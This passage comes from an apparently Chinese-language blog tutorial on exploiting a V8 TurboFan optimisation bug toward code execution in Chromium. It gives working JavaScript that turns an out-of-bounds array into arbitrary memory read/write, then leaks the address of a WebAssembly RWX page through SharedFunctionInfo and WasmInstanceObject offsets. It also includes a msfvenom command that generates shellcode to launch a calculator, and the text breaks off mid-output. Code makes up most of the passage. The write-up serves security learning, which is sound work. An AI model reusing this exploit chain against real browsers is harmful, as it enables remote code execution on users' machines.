之前的相对偏移时，最好不要使用<strong>硬编码</strong>。因为如果需要在当前内存段上再新建立一个对象时，原先的相对偏移很有可能会失效；而且不使用硬编码也可以<strong>更好的将 exp 从 v8 移植到 chromium上</strong>。</p><p>但不使用硬编码时，使用 for循环结果语句 来<strong>循环越界读取数组</strong>将会触发一个<code>CSA_ASSERT</code>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/code-stub-assembler.cc</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// in TNode&lt;Float64T&gt; CodeStubAssembler::LoadFixedDoubleArrayElement</span></span><br><span class="line"><span class="built_in">CSA_ASSERT</span>(<span class="keyword">this</span>, <span class="built_in">IsOffsetInBounds</span>(</span><br><span class="line">    offset, <span class="built_in">LoadAndUntagFixedArrayBaseLength</span>(object),</span><br><span class="line">    FixedDoubleArray::kHeaderSize, HOLEY_DOUBLE_ELEMENTS));</span><br></pre></td></tr></table></figure><p>由于<code>CSA_ASSERT</code>只会在Debug版本下的 v8 生效，因此我们同样可以注释掉该语句再重新编译，不影响 chromium 中 exp 的编写。</p></li><li><p>综上所述，最后构造出的<strong>任意地址读写原语</strong>如下：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">log</span>(<span class="params">msg</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(msg);</span><br><span class="line">    <span class="comment">// var elem = document.getElementById(&quot;#log&quot;);</span></span><br><span class="line">    <span class="comment">// elem.innerText += &#x27;[+] &#x27; + msg + &#x27;\n&#x27;;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- 64位整数 与 64位浮点数相互转换的原语 -- *******/</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> transformBuffer = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">8</span>);</span><br><span class="line"><span class="keyword">var</span> bigIntArray = <span class="keyword">new</span> <span class="title class_">BigInt64Array</span>(transformBuffer);</span><br><span class="line"><span class="keyword">var</span> floatArray = <span class="keyword">new</span> <span class="title class_">Float64Array</span>(transformBuffer);</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">Int64ToFloat64</span>(<span class="params">int</span>)</span><br><span class="line">&#123;</span><br><span class="line">    bigIntArray[<span class="number">0</span>] = <span class="title class_">BigInt</span>(int);</span><br><span class="line">    <span class="keyword">return</span> floatArray[<span class="number">0</span>];</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">Float64ToInt64</span>(<span class="params">float</span>)</span><br><span class="line">&#123;</span><br><span class="line">    floatArray[<span class="number">0</span>] = float;</span><br><span class="line">    <span class="keyword">return</span> bigIntArray[<span class="number">0</span>];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- 修改JSArray length 的操作 -- *******/</span></span><br><span class="line"><span class="keyword">var</span> oob_arr = [];</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    oob_arr = [<span class="number">1.0</span>, <span class="number">1.1</span>, <span class="number">1.2</span>, <span class="number">1.3</span>, <span class="number">1.4</span>, <span class="number">1.5</span>, <span class="number">1.6</span>];</span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= <span class="number">9007199254740990</span>;</span><br><span class="line">    t *= <span class="number">2</span>;</span><br><span class="line">    t += <span class="number">2</span>;</span><br><span class="line">    oob_arr[t] = <span class="number">2.1729236899484389e-311</span>; <span class="comment">// 1024.f2smi</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 试着触发 turboFan，从而修改 JSArray 的 length</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x10000</span>; i++)</span><br><span class="line">    <span class="title function_">opt_me</span>(<span class="number">1</span>);</span><br><span class="line"><span class="comment">// 简单 checker</span></span><br><span class="line"><span class="keyword">if</span>(oob_arr[<span class="number">1023</span>] == <span class="literal">undefined</span>)</span><br><span class="line">    <span class="keyword">throw</span> <span class="string">&quot;OOB Fail!&quot;</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] oob_arr.length == &quot;</span> + oob_arr.<span class="property">length</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- 任意地址读写原语 -- *******/</span></span><br><span class="line"><span class="keyword">var</span> array_buffer;</span><br><span class="line">array_buffer = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x233</span>);</span><br><span class="line">data_view = <span class="keyword">new</span> <span class="title class_">DataView</span>(array_buffer);</span><br><span class="line">backing_store_offset = -<span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 确定backing_store_offset</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x400</span>; i++)</span><br><span class="line">&#123;   </span><br><span class="line">    <span class="comment">// smi(0x233) == 0x0000023300000000</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="title class_">Float64ToInt64</span>(oob_arr[i]) == <span class="number">0x0000023300000000</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        backing_store_offset = i + <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 简单确认一下是否成功找到 backing_store</span></span><br><span class="line"><span class="keyword">if</span>(backing_store_offset == -<span class="number">1</span>)</span><br><span class="line">    <span class="keyword">throw</span> <span class="string">&quot;backing_store is not found!&quot;</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] backing_store offset: &quot;</span> + backing_store_offset);</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">read_8bytes</span>(<span class="params">addr</span>)</span><br><span class="line">&#123;</span><br><span class="line">    oob_arr[backing_store_offset] = <span class="title class_">Int64ToFloat64</span>(addr);</span><br><span class="line">    <span class="keyword">return</span> data_view.<span class="title function_">getBigInt64</span>(<span class="number">0</span>, <span class="literal">true</span>); <span class="comment">// true 设置小端序</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">write_8bytes</span>(<span class="params">addr, data</span>)</span><br><span class="line">&#123;</span><br><span class="line">    oob_arr[backing_store_offset] = <span class="title class_">Int64ToFloat64</span>(addr);</span><br><span class="line">    data_view.<span class="title function_">setBigInt64</span>(<span class="number">0</span>, <span class="title class_">BigInt</span>(data), <span class="literal">true</span>); <span class="comment">// true 设置小端序</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- try arbitrary read/write -- *******/</span></span><br><span class="line"><span class="comment">// 试着读取地址为 0xdeaddead 的内存</span></span><br><span class="line"><span class="title function_">read_8bytes</span>(<span class="number">0xdeaddead</span>);</span><br><span class="line"><span class="comment">// 试着写入地址为 0xdeaddead 的内存</span></span><br><span class="line"><span class="title function_">write_8bytes</span>(<span class="number">0xdeaddead</span>, <span class="number">0x89abcdef</span>);</span><br></pre></td></tr></table></figure><p>测试结果如下：</p><blockquote><p>注：单次只能测试任意读或任意写，不能同时测试。</p></blockquote><ul><li><p>可以将目标数据写入目标地址：</p><p><img src="/2021/01/v8-turboFan/debugprint12.png" alt="img"></p></li><li><p>可以从目标地址中读出数据</p><p><img src="/2021/01/v8-turboFan/debugprint13.png" alt="img"></p></li></ul></li></ul><h4 id="c-泄露-RWX-地址">c. 泄露 RWX 地址</h4><ul><li><p>由于 v8 已经<a href="https://source.chromium.org/chromium/v8/v8.git/+/dde25872f58951bb0148cf43d6a504ab2f280485:src/flag-definitions.h;l=717">取消</a>将 <strong>JIT 编码的 JSFunction</strong> 放入 RWX 内存中 ，因此我们必须另找它法。根据所搜索到的利用方式，有以下两种：</p><ol><li><p>将 Array 的 JSFunction 写入内存并泄露，之后就可以进一步泄露 JSFunction 中的 code 指针。由于这个Code指针指向 chromium 二进制文件内部，因此我们可以将二进制文件拖入 IDA 中计算相对位移，获取 <strong>代码基地址 =&gt; GOT表条目 =&gt; libc基地址 =&gt; enviroment指针</strong>，这样就可以获取到可写的栈地址以及<code>mprotect</code>地址。</p><p>然后将 shellcode 写入栈里并 ROP 调用 mprotect 修改执行权限，最后跳转执行，这样就可以成功执行 shellcode。</p><blockquote><p>此方法来自 Sakura 师傅，第四条参考链接。</p></blockquote></li><li><p>v8 除了编译 JS 以外还编译 WebAssembly （wasm）代码，而 wasm 模块至今仍然<a href="https://source.chromium.org/chromium/chromium/src/+/1bc5adc2c0e057fb0fb91afa0c534dada924f90e:v8/src/flags/flag-definitions.h;l=790">使用</a> RWX 内存，因此我们可以试着将 shellcode 写入这块内存中并执行，不过这个方法有点折腾。</p><blockquote><p>此方法来自 doar-e，第一条参考链接。</p></blockquote></li></ol><p>第一种利用方式非常的直接，利用起来应该没有太大的难度。因此出于学习的目的，我们选择第二种方式，学习一下 WebAssembly 的利用方式。</p></li><li><p>通过查阅这片文章 <a href="https://www.anquanke.com/post/id/150923">浅谈如何逆向分析WebAssembly二进制文件 - 安全客</a>，我们可以获取到wasm的简易使用方式，并通过这个方式获取到 Wasm 的 JSFunction：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// C++ 代码 `void func() &#123;&#125;` 的 wasm 二进制代码</span></span><br><span class="line"><span class="keyword">let</span> wasmCode = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>([<span class="number">0</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">109</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">96</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">3</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">112</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">5</span>,<span class="number">131</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">6</span>,<span class="number">129</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">7</span>,<span class="number">145</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">6</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">109</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">121</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">10</span>,<span class="number">136</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">11</span>]);</span><br><span class="line"><span class="keyword">let</span> m = <span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Instance</span>(<span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Module</span>(wasmCode),&#123;&#125;);</span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunction</span> = m.<span class="property">exports</span>.<span class="property">func</span>;</span><br></pre></td></tr></table></figure></li><li><p>而对于一个 Wasm 的 JSFunction，我们可以通过以下路径来获取 RWX 段地址：</p><blockquote><p>这条路径稍微有点长：JSFunction  -&gt; SharedFunctionInfo -&gt; WasmExportedFunctionData -&gt; WasmInstanceObject -&gt; JumpTableStart。</p></blockquote><ul><li><p>从 JSFunction 出发，获取其 SharedFunctionInfo（相对偏移为 0x18）</p><p><img src="/2021/01/v8-turboFan/debugprint6.png" alt="img"></p></li><li><p>之后从 SharedFunctionInfo 获取其 WasmExportedFunctionData（相对偏移为 0x8）</p><p><img src="/2021/01/v8-turboFan/debugprint7.png" alt="img"></p></li><li><p>再从 WasmExportedFunctionData 中获取 WasmInstanceObject（相对偏移为 0x10）</p><p><img src="/2021/01/v8-turboFan/debugprint8.png" alt="img"></p></li><li><p>最后从 WasmInstanceObject 中获取 JumpTableStart（相对偏移为 0xe8）</p><p><img src="/2021/01/v8-turboFan/debugprint9.png" alt="img"></p></li></ul></li><li><p>查看获取到的 JumpTableStart 位置处的数据，我们可以发现这里是一串汇编代码。给该位置下断，并在 JS 中执行一下 Wasm 的 JSFunction ，我们可以发现控制流被断点成功捕获：</p><p><img src="/2021/01/v8-turboFan/debugprint10.png" alt="img"></p><p>以下是测试用的 JS 代码：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// C++ 代码 `void func() &#123;&#125;` 的 wasm 二进制代码</span></span><br><span class="line"><span class="keyword">let</span> wasmCode = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>([<span class="number">0</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">109</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">1</span>,<span class="number">96</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">3</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">112</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">5</span>,</span><br><span class="line">    <span class="number">131</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">6</span>,<span class="number">129</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">7</span>,<span class="number">145</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">2</span>,</span><br><span class="line">    <span class="number">6</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">109</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">121</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">10</span>,<span class="number">136</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">1</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">11</span>]);</span><br><span class="line"><span class="keyword">let</span> m = <span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Instance</span>(<span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Module</span>(wasmCode),&#123;&#125;);</span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunction</span> = m.<span class="property">exports</span>.<span class="property">func</span>;</span><br><span class="line"><span class="comment">// 输出一下 Wasm JSFunction 地址，并获取其 JumpTableStart</span></span><br><span class="line">%<span class="title class_">DebugPrint</span>(<span class="title class_">WasmJSFunction</span>);</span><br><span class="line"><span class="comment">// 之后在 gdb 中给 JumpTableStart 下个断点</span></span><br><span class="line">%<span class="title class_">SystemBreak</span>();</span><br><span class="line"><span class="comment">// 尝试执行 Wasm JSFunction</span></span><br><span class="line"><span class="title class_">WasmJSFunction</span>();</span><br><span class="line">%<span class="title class_">SystemBreak</span>();</span><br></pre></td></tr></table></figure></li><li><p>现在情况已经非常明了了，通过之前构建的任意地址读取原语，一步步读取 Wasm JSFunction 的各个属性并最终获取 RWX 内存地址：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">prettyHex</span>(<span class="params">bigint</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">return</span> <span class="string">&quot;0x&quot;</span> + <span class="title class_">BigInt</span>.<span class="title function_">asUintN</span>(<span class="number">64</span>,bigint).<span class="title function_">toString</span>(<span class="number">16</span>).<span class="title function_">padStart</span>(<span class="number">16</span>, <span class="string">&#x27;0&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// C++ 代码 `void func() &#123;&#125;` 的 wasm 二进制代码</span></span><br><span class="line"><span class="keyword">var</span> wasmCode = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>([<span class="number">0</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">109</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">1</span>,<span class="number">96</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">3</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">112</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">5</span>,</span><br><span class="line">    <span class="number">131</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">6</span>,<span class="number">129</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">7</span>,<span class="number">145</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">2</span>,</span><br><span class="line">    <span class="number">6</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">109</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">121</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">10</span>,<span class="number">136</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,</span><br><span class="line">    <span class="number">0</span>,<span class="number">1</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">11</span>]);</span><br><span class="line"><span class="keyword">var</span> m = <span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Instance</span>(<span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Module</span>(wasmCode),&#123;&#125;);</span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunction</span> = m.<span class="property">exports</span>.<span class="property">func</span>;</span><br><span class="line"><span class="comment">// 将WasmJSFunction 布置到与 oob_arr 数组相同的内存段上</span></span><br><span class="line"><span class="comment">// 这里写入了一个哨兵值0x233333，用于查找 WasmJSFunction 地址</span></span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunctionObj</span> = &#123;<span class="attr">guard</span>: <span class="title class_">Int64ToFloat64</span>(<span class="number">0x233333</span>), <span class="attr">wasmAddr</span>: <span class="title class_">WasmJSFunction</span>&#125;;</span><br><span class="line"><span class="keyword">var</span> <span class="title class_">WasmJSFunctionIndex</span> = -<span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x4000</span>; i++)</span><br><span class="line">&#123;   </span><br><span class="line">    <span class="comment">// 查找哨兵值</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="title class_">Float64ToInt64</span>(oob_arr[i]) == <span class="number">0x233333</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title class_">WasmJSFunctionIndex</span> = i + <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 简单确认一下是否成功找到 WasmJSFunctionAddr</span></span><br><span class="line"><span class="keyword">if</span>(<span class="title class_">WasmJSFunctionIndex</span> == -<span class="number">1</span>)</span><br><span class="line">    <span class="keyword">throw</span> <span class="string">&quot;WasmJSFunctionAddr is not found!&quot;</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] find WasmJSFunctionAddr offset: &quot;</span> + <span class="title class_">WasmJSFunctionIndex</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 获取 WasmJSFunction 地址</span></span><br><span class="line"><span class="title class_">WasmJSFunctionAddr</span> = <span class="title class_">Float64ToInt64</span>(oob_arr[<span class="title class_">WasmJSFunctionIndex</span>]) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find WasmJSFunction address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmJSFunctionAddr</span>));</span><br><span class="line"><span class="comment">// 获取 SharedFunctionInfo 地址</span></span><br><span class="line"><span class="title class_">SharedFunctionInfoAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmJSFunctionAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x18</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find SharedFunctionInfoAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">SharedFunctionInfoAddr</span>));</span><br><span class="line"><span class="comment">// 获取 WasmExportedFunctionData 地址</span></span><br><span class="line"><span class="title class_">WasmExportedFunctionDataAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">SharedFunctionInfoAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x8</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find WasmExportedFunctionDataAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmExportedFunctionDataAddr</span>));</span><br><span class="line"><span class="comment">// 获取 WasmInstanceObject 地址</span></span><br><span class="line"><span class="title class_">WasmInstanceObjectAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmExportedFunctionDataAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x10</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find WasmInstanceObjectAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmInstanceObjectAddr</span>));</span><br><span class="line"><span class="comment">// 获取 JumpTableStart 地址</span></span><br><span class="line"><span class="title class_">JumpTableStartAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmInstanceObjectAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0xe8</span>));</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find JumpTableStartAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">JumpTableStartAddr</span>));</span><br></pre></td></tr></table></figure><p>需要注意的是，在读取<code>WasmExportedFunctionDataAddr</code>时会触发 debug 的越界检查：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/code-stub-assembler.cc</span></span><br><span class="line"><span class="comment">// in CodeStubAssembler::FixedArrayBoundsCheck</span></span><br><span class="line"><span class="built_in">CSA_CHECK</span>(<span class="keyword">this</span>, <span class="built_in">UintPtrLessThan</span>(effective_index,</span><br><span class="line">                                  <span class="built_in">LoadAndUntagFixedArrayBaseLength</span>(array)));</span><br></pre></td></tr></table></figure><p>注释掉再重新编译即可。</p></li></ul><h4 id="d-shellcode">d. shellcode</h4><p>最后我们只要将 shellcode 写入该 RWX 地址处并调用 Wasm JSFunction 即可成功执行 shellcode。</p><p>使用 msfvenom 生成满足以下条件的 shellcode:</p><ul><li><p>payload为 <code>linux x64</code></p></li><li><p>格式为 C语言</p></li><li><p>命令为<code>DISPLAY=:0 gnome-calculator</code></p></li></ul><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p linux/x64/exec CMD=<span class="string">&#x27;DISPLAY=:0 gnome-calculator&#x27;</span> -f c</span><br></pre></td></tr></table></figure><p>输出如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Payload size: <span class="number">67</span> bytes</span><br><span class="line">Final size of c file: <span 